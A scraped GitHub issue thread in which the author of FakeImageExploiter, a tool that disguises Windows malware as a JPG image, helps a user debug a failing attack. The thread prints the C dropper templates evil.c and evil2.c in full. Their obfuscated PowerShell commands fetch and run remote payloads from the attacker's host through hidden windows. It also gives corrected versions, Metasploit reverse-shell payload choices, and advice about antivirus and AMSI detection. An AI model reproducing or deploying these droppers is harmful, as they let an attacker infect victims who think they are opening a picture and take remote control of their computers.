Can't run "fake image" on Windows 7 about fakeimageexploiter HOT 14 CLOSED

wait. i belive i have found the error (and its on obfuscation)..
check fakeimageexploiter.sh line 332

 echo "pOwErShElL /n\`oP /wI\`N 1 /nO\`nI /e\`N Sh33L" > payload.raw

I bet Thats why the 'real' payload dosent execute on target (because of obfuscation errors)..
(replace line 332 by this one and try again)

 echo "pOwErShElL -noP -wIN 1 -noni -en Sh33L" > payload.raw

Final notes:

i see for your settings file that you have not been able to install Resource-Hacker under wine..
we need to be the two of us online to check (install) RH under wine, iam working in a new tool
named JASTF (Just A Simple Text File [exploiter]) and my wife uses parrot x64bits, we also have
faced many issues trying to install wine32 under x64bits, but we manage to do it ..
(i have not had the time to update FakeImageExploiter with this fix yet) ..

   BYPASS_RH=YES

from fakeimageexploiter.

thank you very much， I modified line 336 and it is working now.
fakeimageexploiter.sh line 336

  echo "pOwErShElL /n\`oP /wI\`N 1 /nO\`nI /e\`N Sh33L" > payload.raw    
  echo "pOwErShElL -noP -wIN 1 -noni -en Sh33L" > payload.raw

from fakeimageexploiter.

good work many many thanks for assistance

from fakeimageexploiter.

I have turned off anti-vius, and checked the client, the client task manager did not run jpg.exe, I just modified the two files. I tried the win7 and win10 systems. The same failure
lm just changed two files .other files not modified.

1. evil.c
   #include<stdio.h>
   #include<stdlib.h>
   #include<winsock2.h>
   #include<windows.h>

#define _____(i,s,o,g,r,a,m)(i##r##s##o)
#define _ _____(m,i,n,u,a,l,s)

int _()
{
system("PoWeRsHeLl -wIN 1 -C (nEw-ObJeCt NeT.WebClIeNt).dOwNlOaDfIlE('ht'+'tp'+':/'+'/LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & PoWeRsHeLl -wIN 1 -C C:\\Users\\Public\\ScRee & PoWeRsHeLl -wIN 1 -C \"IEX (NeW-oBjEcT nEt.WeBClIeNt).DoWnLoAdSt`RiNg('ht'+'t'+'p:/'+'/LhOsT/payload.EhLh')"");
return 0;
}

2.evil2.c

#include<stdio.h>
#include<stdlib.h>
#include<winsock2.h>
#include<windows.h>

#define _____(i,s,o,g,r,a,m)(i##r##s##o)
#define _ _____(m,i,n,u,a,l,s)

int _()
{
system("PoWeRsHeLl -wIN 1 -C (nEw-ObJeCt NeT.WebClIeNt).DoWnLoAdFiLe('ht'+'tp:'+'/'+'/LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & sTaRt C:\\Users\\Public\\ScRee & PoWeRsHeLl -wIN 1 -C (NeW-oBjEcT nEt.WeBClIeNt).dOwNlOaDfIlE('h'+'ttp:'+'/'+'/LhOsT/payload.EhLh', 'C:\Users\Public\payload.EhLh') & StArT C:\Users\Public\payload.EhLh");
return 0;
}

from fakeimageexploiter.

lm change FakeimageExploiter.sh

if [ "$ArCh" = "i686" ]; then
dEd="x86"
arch="wine"
PgFi="Program Files"
ComP="i586-mingw32msvc-gcc"
else
dEd="x86"
arch="wine"
PgFi="Program Files"
ComP="i586-mingw32msvc-gcc"
fi

and runing FakeimageExploiter.sh,

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+---+
|F|a|k|e|I|m|a|g|e|E|x|p|l|o|i|t|e|r|:|1.3|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-----+

Extension sellected: .jpg (picture)
Extension sellected: .exe (payload)

'Config settings file to use other extensions'

Codename::Metamorphosis
Author::pedr0 ubuntu::[r00t-3xp10it]
FakeImageExploiter::v1.3::SuspiciousShellActivity©::RedTeam::2017

my settings

root@kali:~/FakeImageExploiter# cat settings | grep -Ev "^$|^#|-"
PICTURE_EXTENSION=jpg
PAYLOAD_EXTENSION=exe
BYPASS_RH=YES
APACHE_WEBROOT=/var/www/html
NON_MSF_PAYLOADS=NO
AUTO_PAYLOAD_BUILD=YES
AGENT_HANDLER_PORT=4444
FAKE_WORD_DOC=NO
USE_PUBLIC_IP=NO
EXTERNAL_IP=write_public_address_here
MSF_REBUILD=OFF
_EOF

The same operation, I don't know why I always failed to run. Hahahaha

from fakeimageexploiter.

well ... it seems that windows updates have changed something ...
"In cmd.exe we call command flags using: [ - ] or: [ / ] <-- this is used as one obfuscated trick"
example 1: powershell.exe -windows hidden (default way)
example 2: powershell.exe /windows hidden

But in your report it seems that the replacement obfuscation trick does not work anymore..
"The term /w`In its not recognized"
"Object not found /wIn - commandnotfoundexception"

possible fixes

1º - edit the template FakeImageExploiter/bin/evil.c
https://github.com/r00t-3xp10it/FakeImageExploiter/blob/master/bin/evil.c

2º - edit the template FakeImageExploiter/bin/evil2.c [.exe payloads]
https://github.com/r00t-3xp10it/FakeImageExploiter/blob/master/bin/evil2.c

3º - replace the string: PoWeRsHeLl /wI`N 1 /C <--- (ALL instances of that pattern)
by: PoWeRsHeLl -wIN 1 -C

4º - save evil.c and evil2.c template and run fakeimageexploiter.sh now ..

Final notes:

  Last upgrade to this project was the implementation of 'obfuscation technics' into the 'dropper',
  maybee some of those changes are conflicting with recent AMSI rules of detecting mallware,
  ( what does not seem to be the case here, because we dont see any AMSI bug reports ), so lets
  asume that the bug its on the 'obfuscation' technics into the 'dropper' when its executed..

from fakeimageexploiter.

I changed two files, jpg.exe can be executed, but after execution, the server cannot receive the client connection.......

from fakeimageexploiter.

Anti-Virus (AMSI) its detecting payload ? ..
try to disable anti-virus and see if it executes ..

from fakeimageexploiter.

many thanks for this report (this will help me)...

• 1º so the anti-virus its not the issue rigth?

• 2º maybee the problem its on obfuscation technics
  
  nEw-ObJeCt NeT.WebClIeNt

change evil.c

  system("powershell -w 1 -C (new-object system.net.webclient).downloadfile('http://LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & powershell -w 1 -C C:\\Users\\Public\\ScRee & powershell -w 1 -C \"IEX (new-object net.webclient).downloadstring('http://LhOsT/payload.EhLh')\"");

change evil2.c

   system("powershell -w 1 -C (New-object Net.WebClient).Downloadfile('http://LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & start C:\\Users\\Public\\ScRee & powershell -w 1 -C (New-Object net.WebClient).Downloadfile('http://LhOsT/payload.EhLh', 'C:\Users\Public\payload.EhLh') & start C:\Users\Public\payload.EhLh");

from fakeimageexploiter.

I replaced two files, now the client can run, and after the run, there is a jpg picture, but the MSF server still does not establish a connection, I tried win7 win10 win2012 server, the same picture can be run but the MSF server can not receive Request connection to the client.

My kali version
Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux
root@kali:~# msfconsole -v
Framework Version: 4.17.17-

from fakeimageexploiter.

now iam lost ..
there are youtube videos showing this tool working in diferent operative systems/versions..
https://www.youtube.com/results?search_query=fakeimageexploiter

let me check if the tool still works or if not ..
maybee we need to test this step-by-step to figure it out whats appenning in your distro..

• 1º - edit FakeImageExploiter.sh and change this next settings..
  

• 2º - change compiler arch
  ..

• 3º - are you sure that you have config proper the 'settings' file before run the tool ??
  

• 4º - The real payload not execution (real payload, not the dropper) can also reveal incorrect
  payload arch sellection. if you are attacking a x64bit system did you try it with one x64 arch payload?

  windows/x64/meterpreter/reverse_tcp
  windows/x64/meterpreter/reverse_https
  

• 5º - check for zenity installation

  zenity --version
  

from fakeimageexploiter.

aaa i have spot one error in your configuration ..

   AUTO_PAYLOAD_BUILD=YES
   PAYLOAD_EXTENSION=exe

the above option will instruct fakeimageexploiter tool to build one payload..
But if you read the settings file it says that auto_payload_build option will not build .exe payloads
(maybee thats the reason why the payload.exe does not execute, because it dosent exist?)

If everything its proper installed , then sellect payload_extension=ps1 (or bat or txt) to be able to use the auto_payload_build option .. If you wish to use one .exe then you need to config settings file to: auto_payload_build=NO and payload_extension=exe and then input your own .exe in zenity dialog-box when my tool asks you for it ..

Please review this issue: #16 (comment)

Question: does your distro have ZENITY packet installed ??

does my tool presents to you one dialog-box making questions ?? zenity dialog-boxs
Check if you have zenity installed with this command..

  zenity --version

Download zenity: https://help.gnome.org/users/zenity/

from fakeimageexploiter.

change the settings ,
PICTURE_EXTENSION=jpg
PAYLOAD_EXTENSION=ps1
BYPASS_RH=YES
APACHE_WEBROOT=/var/www/html
NON_MSF_PAYLOADS=NO
AUTO_PAYLOAD_BUILD=YES
AGENT_HANDLER_PORT=4444
FAKE_WORD_DOC=NO
USE_PUBLIC_IP=NO
EXTERNAL_IP=write_public_address_here
MSF_REBUILD=OFF
_EOF

zenity --version
3.30.0

l can run the finished program and create a jpg image. win7 win10 can run and display jpg images, but it is impossible to connect to the FakeImageExploiter service.

msf always waiting for the connect ........

from fakeimageexploiter.

its 5:25 am (portugal) ..
now i need to sleep but tomorrow iam free to help you install RH under wine..

here is your prize for helping me (i have written/published this esterday) ;)
https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/windows/hijack/SCRNSAVE_T1180_persistence.rb

mitre ATT&CK T1180: https://gist.github.com/r00t-3xp10it/75c637ffa515ed4260749cbb24e989e2

Recent changes made to FakeImageExploiter (thanks)

Commit (sourcecode bugfixs): 3394c96

from fakeimageexploiter.